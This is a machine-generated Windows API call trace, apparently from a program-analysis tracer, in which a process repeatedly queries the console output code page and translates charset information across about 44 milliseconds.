[0192.606] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.607] GetConsoleOutputCP () returned 0x1b5 [0192.607] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.607] GetConsoleOutputCP () returned 0x1b5 [0192.607] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.607] GetConsoleOutputCP () returned 0x1b5 [0192.607] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.607] GetConsoleOutputCP () returned 0x1b5 [0192.608] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.608] GetConsoleOutputCP () returned 0x1b5 [0192.608] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.608] GetConsoleOutputCP () returned 0x1b5 [0192.608] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.608] GetConsoleOutputCP () returned 0x1b5 [0192.608] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.608] GetConsoleOutputCP () returned 0x1b5 [0192.609] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.609] GetConsoleOutputCP () returned 0x1b5 [0192.609] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.609] GetConsoleOutputCP () returned 0x1b5 [0192.609] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.609] GetConsoleOutputCP () returned 0x1b5 [0192.609] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.609] GetConsoleOutputCP () returned 0x1b5 [0192.610] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.610] GetConsoleOutputCP () returned 0x1b5 [0192.610] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.610] GetConsoleOutputCP () returned 0x1b5 [0192.610] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.610] GetConsoleOutputCP () returned 0x1b5 [0192.610] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.610] GetConsoleOutputCP () returned 0x1b5 [0192.611] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.611] GetConsoleOutputCP () returned 0x1b5 [0192.611] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.611] GetConsoleOutputCP () returned 0x1b5 [0192.611] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.611] GetConsoleOutputCP () returned 0x1b5 [0192.612] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.612] GetConsoleOutputCP () returned 0x1b5 [0192.612] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.612] GetConsoleOutputCP () returned 0x1b5 [0192.612] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.612] GetConsoleOutputCP () returned 0x1b5 [0192.612] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.613] GetConsoleOutputCP () returned 0x1b5 [0192.613] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.613] GetConsoleOutputCP () returned 0x1b5 [0192.613] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.613] GetConsoleOutputCP () returned 0x1b5 [0192.613] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.613] GetConsoleOutputCP () returned 0x1b5 [0192.614] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.614] GetConsoleOutputCP () returned 0x1b5 [0192.614] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.614] GetConsoleOutputCP () returned 0x1b5 [0192.614] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.614] GetConsoleOutputCP () returned 0x1b5 [0192.614] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.614] GetConsoleOutputCP () returned 0x1b5 [0192.615] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.615] GetConsoleOutputCP () returned 0x1b5 [0192.615] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.615] GetConsoleOutputCP () returned 0x1b5 [0192.615] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.615] GetConsoleOutputCP () returned 0x1b5 [0192.616] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.616] GetConsoleOutputCP () returned 0x1b5 [0192.616] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.616] GetConsoleOutputCP () returned 0x1b5 [0192.616] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.616] GetConsoleOutputCP () returned 0x1b5 [0192.617] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.617] GetConsoleOutputCP () returned 0x1b5 [0192.617] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.617] GetConsoleOutputCP () returned 0x1b5 [0192.617] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.617] GetConsoleOutputCP () returned 0x1b5 [0192.617] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.617] GetConsoleOutputCP () returned 0x1b5 [0192.618] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.618] GetConsoleOutputCP () returned 0x1b5 [0192.618] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.618] GetConsoleOutputCP () returned 0x1b5 [0192.618] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.618] GetConsoleOutputCP () returned 0x1b5 [0192.618] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.619] GetConsoleOutputCP () returned 0x1b5 [0192.619] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.619] GetConsoleOutputCP () returned 0x1b5 [0192.619] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.619] GetConsoleOutputCP () returned 0x1b5 [0192.619] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.619] GetConsoleOutputCP () returned 0x1b5 [0192.620] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.620] GetConsoleOutputCP () returned 0x1b5 [0192.620] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.620] GetConsoleOutputCP () returned 0x1b5 [0192.620] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.620] GetConsoleOutputCP () returned 0x1b5 [0192.620] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.620] GetConsoleOutputCP () returned 0x1b5 [0192.621] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.621] GetConsoleOutputCP () returned 0x1b5 [0192.621] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.621] GetConsoleOutputCP () returned 0x1b5 [0192.621] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.621] GetConsoleOutputCP () returned 0x1b5 [0192.621] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.622] GetConsoleOutputCP () returned 0x1b5 [0192.622] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.622] GetConsoleOutputCP () returned 0x1b5 [0192.622] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.622] GetConsoleOutputCP () returned 0x1b5 [0192.622] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.622] GetConsoleOutputCP () returned 0x1b5 [0192.623] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.623] GetConsoleOutputCP () returned 0x1b5 [0192.623] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.623] GetConsoleOutputCP () returned 0x1b5 [0192.623] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.623] GetConsoleOutputCP () returned 0x1b5 [0192.623] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.623] GetConsoleOutputCP () returned 0x1b5 [0192.624] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.624] GetConsoleOutputCP () returned 0x1b5 [0192.624] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.624] GetConsoleOutputCP () returned 0x1b5 [0192.624] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.624] GetConsoleOutputCP () returned 0x1b5 [0192.624] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.625] GetConsoleOutputCP () returned 0x1b5 [0192.625] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.625] GetConsoleOutputCP () returned 0x1b5 [0192.625] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.625] GetConsoleOutputCP () returned 0x1b5 [0192.625] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.625] GetConsoleOutputCP () returned 0x1b5 [0192.626] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.626] GetConsoleOutputCP () returned 0x1b5 [0192.626] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.626] GetConsoleOutputCP () returned 0x1b5 [0192.626] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.626] GetConsoleOutputCP () returned 0x1b5 [0192.627] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.627] GetConsoleOutputCP () returned 0x1b5 [0192.627] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.627] GetConsoleOutputCP () returned 0x1b5 [0192.627] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.627] GetConsoleOutputCP () returned 0x1b5 [0192.627] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.627] GetConsoleOutputCP () returned 0x1b5 [0192.628] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.628] GetConsoleOutputCP () returned 0x1b5 [0192.628] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.628] GetConsoleOutputCP () returned 0x1b5 [0192.628] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.628] GetConsoleOutputCP () returned 0x1b5 [0192.629] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.629] GetConsoleOutputCP () returned 0x1b5 [0192.629] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.629] GetConsoleOutputCP () returned 0x1b5 [0192.629] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.629] GetConsoleOutputCP () returned 0x1b5 [0192.629] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.629] GetConsoleOutputCP () returned 0x1b5 [0192.630] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.630] GetConsoleOutputCP () returned 0x1b5 [0192.630] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.630] GetConsoleOutputCP () returned 0x1b5 [0192.630] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.630] GetConsoleOutputCP () returned 0x1b5 [0192.630] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.630] GetConsoleOutputCP () returned 0x1b5 [0192.631] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.631] GetConsoleOutputCP () returned 0x1b5 [0192.631] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.631] GetConsoleOutputCP () returned 0x1b5 [0192.631] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.631] GetConsoleOutputCP () returned 0x1b5 [0192.632] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.632] GetConsoleOutputCP () returned 0x1b5 [0192.632] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.632] GetConsoleOutputCP () returned 0x1b5 [0192.632] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.632] GetConsoleOutputCP () returned 0x1b5 [0192.632] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.632] GetConsoleOutputCP () returned 0x1b5 [0192.633] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.634] GetConsoleOutputCP () returned 0x1b5 [0192.634] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.634] GetConsoleOutputCP () returned 0x1b5 [0192.634] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.634] GetConsoleOutputCP () returned 0x1b5 [0192.634] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.634] GetConsoleOutputCP () returned 0x1b5 [0192.635] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.635] GetConsoleOutputCP () returned 0x1b5 [0192.635] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.635] GetConsoleOutputCP () returned 0x1b5 [0192.635] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.635] GetConsoleOutputCP () returned 0x1b5 [0192.636] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.636] GetConsoleOutputCP () returned 0x1b5 [0192.637] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.637] GetConsoleOutputCP () returned 0x1b5 [0192.637] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.637] GetConsoleOutputCP () returned 0x1b5 [0192.637] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.637] GetConsoleOutputCP () returned 0x1b5 [0192.638] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.638] GetConsoleOutputCP () returned 0x1b5 [0192.638] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.638] GetConsoleOutputCP () returned 0x1b5 [0192.638] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.638] GetConsoleOutputCP () returned 0x1b5 [0192.639] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.639] GetConsoleOutputCP () returned 0x1b5 [0192.639] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.639] GetConsoleOutputCP () returned 0x1b5 [0192.639] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.639] GetConsoleOutputCP () returned 0x1b5 [0192.639] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.640] GetConsoleOutputCP () returned 0x1b5 [0192.640] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.640] GetConsoleOutputCP () returned 0x1b5 [0192.640] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.640] GetConsoleOutputCP () returned 0x1b5 [0192.640] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.640] GetConsoleOutputCP () returned 0x1b5 [0192.641] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.641] GetConsoleOutputCP () returned 0x1b5 [0192.641] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.641] GetConsoleOutputCP () returned 0x1b5 [0192.641] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.641] GetConsoleOutputCP () returned 0x1b5 [0192.642] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.642] GetConsoleOutputCP () returned 0x1b5 [0192.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.649] GetConsoleOutputCP () returned 0x1b5 [0192.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.649] GetConsoleOutputCP () returned 0x1b5 [0192.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.649] GetConsoleOutputCP () returned 0x1b5 [0192.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.649] GetConsoleOutputCP () returned 0x1b5 [0192.650] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.650] GetConsoleOutputCP () returned 0x1b5 [0192.650] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.650] GetConsoleOutputCP () returned 0x1b5 [0192.650] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.650] GetConsoleOutputCP () returned 0x1b5 